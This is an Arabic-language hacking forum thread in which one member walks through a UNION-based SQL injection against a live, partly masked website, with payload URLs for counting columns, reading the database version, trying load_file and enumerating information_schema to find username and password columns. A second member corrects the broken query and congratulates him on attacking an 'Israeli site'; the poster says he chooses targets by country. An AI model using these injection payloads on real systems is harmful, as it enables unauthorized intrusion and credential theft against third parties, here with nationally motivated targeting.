التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 09-14-2009, 03:41 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية T-72
 

 

 
إحصائية العضو





T-72 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
T-72 is on a distinguished road

Talking غير مجاب: ثغرة حقن وجعت رااسي


كيف الشباب

سؤالي اكيد بسيط بالنسبه الكن

رح اتركن مع الخطوات

http://********/etemplate.php?id=58 موقع مصاب


.................................................. .............................................


عدد الاعمده http://*******/etemplate.php?id=58+order+by+13


.................................................. ................................................


نفذت هاد الامر


http://******/etemplate.php?id=58+an...lect+1,2,3,4,5 ,6,7,8,9,10,11,12,13


ظهر العامود الخامس مصاب


.................................................. .................................................



انتقلت للامر لمعرفه اصدار القاعده

http://******/etemplate.php?id=58+an...lect+1,2,3,4,v ersion(),6,7,8,9,10,11,12,13


ظهر الاصدار 5.0.45-community-nt


.................................................. .................................................. ..........................


انتقلت للامر لفحص السيرفر load_file('/')

http://****/etemplate.php?id=58+and+...select+1,2,3,4, load_file('/'),6,7,8,9,10,11,12,13


ظهر خطأ ؟؟؟؟


طنشت الخطة هي



.................................................. .................................................. .......


انتقلت للامر

http://******/etemplate.php?id=58+an...lect+1,2,3,4,c oncat(table_name,0x3a,column_name,0x3a,table_schem a),6,7,8,9,10,11,12,13+from+information_schema.col umns


ظهر عواميد اليوزر و الباس

CHARACTER_SETS:CHARACTER_SET_NAME:information_sche ma




.................................................. .................................................


انتقلت للامر التالي لاجيب عامود الباسورد

where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

طبعا كلمة pas مشفره تشفير mysql char


بعد تنفيذ الامر يظهر الخطأأ




لهون وصلت وم عاد فيي اتحرك خطوه


والحل ي شباب

شو المشكله وكيف فيني كمل



حاسس حالي صرت قريب من اسم الادمن والباسوورد


:00001793[1]: > مبسوط


الحل ي شباب



بر[ب]




Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC eyvm prk ,[uj vhhsd

   

رد مع اقتباس
قديم 09-15-2009, 11:36 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


كيف وضعت الامر ادناه بالحقنه

اقتباس


انتقلت للامر التالي لاجيب عامود الباسورد

where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

طبعا كلمة pas مشفره تشفير mysql char



كل خطواتك تمام بتمام
بس هذه الخطوه ما وضحتها انت كيف عملتها
اشي تاني يا ريت لو تضع الموقع لحتا نقدر نساعدك اكثر ولا تخاف ع الموقع
ما حد يخترقه قبلك ان شاء الله
التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 09-15-2009, 10:50 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية T-72
 

 

 
إحصائية العضو





T-72 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
T-72 is on a distinguished road

افتراضي


انا فعلا خايف حدا يخترقو قبلي

بس ملاحظه قبل م اخترقو
رح اعرف طبيعت الموقع

ازا كان يستاهل الاختراق ولا لا

وهي بتركا الك تقرر

لانو الموقع البلد : اسرائيل

رح كملك شو عملت انا
من النقطه اللي م فهمتها انتا

لاعرف العامود والجدول طبقت

الامر التالي

http://******/etemplate.php?id=58+an...E+LIKE+CHAR(37, 112, 97, 115, 37)


التعديل الأخير تم بواسطة T-72 ; 09-15-2009 الساعة 10:59 PM.

   

رد مع اقتباس
قديم 09-15-2009, 11:05 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية T-72
 

 

 
إحصائية العضو





T-72 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
T-72 is on a distinguished road

افتراضي


ع فكرا


كل المواقع اللي حاولت فيها

صادفتني نفس المشكله


يعني بوصل لهون وم عاد اتقدم ولا خطوه


اكيد في خطأأ
رايح عن باالي

ي ريت تشرحي باقي الخطوات كيف


ناطر ردك بفارغ الصبر


بر[ب]

   

رد مع اقتباس
قديم 09-16-2009, 12:07 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة ريتشل كوري
انا فعلا خايف حدا يخترقو قبلي


[url]http://******/etemplate.php?id=58+and+1=0+union+select+1,2,3,4,7 ,6,7,8,9,10,11,12,13+from+information_schema.colum nswhere+CHARACTER_SET_NAME+LIKE+CHAR(37, 112, 97, 115, 37)

خطأك زي ما كنت متوقع

شوف علامه الزائد قبل كلمه where مش موجوده صح
ضيفها وشوف كيف الناتح من عندي


كود PHP:

******/etemplate.php?id=58+and+1=0+union+select+1,2,3,4,7,6,7,8,9,10,11,12,13+from+information_schema.columns+where+CHARACTER_SET_NAME+LIKE+CHAR(371129711537

مبروك الموقع الاسرائيلي يلا واصل اخي
التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة ميتا جديدة لإختراق ويندوز فيستا + شرح استغلالها , تحميل الميتا الجديد ! 500 ثغرة :] Hαcĸer'ѕ Kιɴɢ قســم إختــراق الأجهــزة 4 11-27-2010 04:01 AM
طلب ثغرة Garwasha جـــ'ابات العناكــ'ب 5 01-26-2010 08:13 AM
ثغرة من فرن M!M0 قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 4 01-07-2010 09:28 PM
[ثغرة]في نسخه 3.8.2 xman2 قســم تطويــر المــــواقع 0 09-27-2009 04:21 AM


الساعة الآن 05:47 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0